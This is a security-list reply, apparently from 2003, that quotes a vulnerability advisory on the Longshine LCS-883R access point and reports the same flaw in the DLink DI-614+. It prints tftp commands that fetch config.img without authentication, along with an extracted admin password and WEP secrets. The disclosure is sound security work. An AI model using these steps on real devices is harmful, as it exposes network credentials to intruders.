Back to list
Longshine WLAN Access-Point LCS-883R VU#310201
Jan 06 2003 10:52AM
Lukas Grunwald (lukas dnx de)
Re: Longshine WLAN Access-Point LCS-883R VU#310201
Jan 06 2003 06:57PM
heydowns borg com
This vulnerability is also an issue on the popular DLink DI-614+ (which I
think is based upon the Longshine product). I was able to grab config.img
and also extract the "admin" password from it. This was confirmed with
firmware version 2.03 dated 9/10/2002.
On the DLink product, you can only perform this from the "LAN-side" of the
device in the default configuration.
DLink has version 2.10 available, dated 11/25/2002, but I have not tried
On Mon, 6 Jan 2003, Lukas Grunwald wrote:
> Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
> Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
> Description: Get Superuser Privileges and view the devices password and password and other passwords
> Versions affected: tested with 03.01.0b and 03.01.0h
> Vendor contacted: e-mailed Longshine at Sun Dec 29
> Details: You are able to connect via tftp to the access-point an you can get download the configuration
> without authentication the WEP Secret for the encryption and the password from your radius server is also readable.
> In this configuration in the Username of the Superuser and the corresponding password stored.
> The WEP Secret for the encryption and the password from your radius server is also readable.
> This "attack" works via WLAN (!!!) and Ethernet.
> tftp> connect 192.168.108.48
> tftp> get config.img
> Received 780 bytes in 1.0 seconds
> tftp> quit
> [~]/-\>strings config.img
> DNXLABAP01 <- name of the AP
> root <- name of the superuser
> XXXXXX123 <- password from superuser
> DNXLABLAN <- ssid
> secu9 <- secret for WEP
> 7890abcdef <-
> You are also able to get the following files:
> Solution: after contact with the vendor he claims that a new firmware-upgrade
> fixes this problem, but the latest available firmware on his web-page
> dosn't fix it anyway.
> LONGSHINE Technologie (Europe) GmbH
> An der Strusbek 9
> D-22926 Ahrensburg
> Tel: ++ 49 ( 0 ) 4102 / 4922- 0
> Fax: ++ 49 ( 0 ) 4102 / 40109
> support (at) longshine (dot) de [email concealed]
[ reply ]
Copyright 2010, SecurityFocus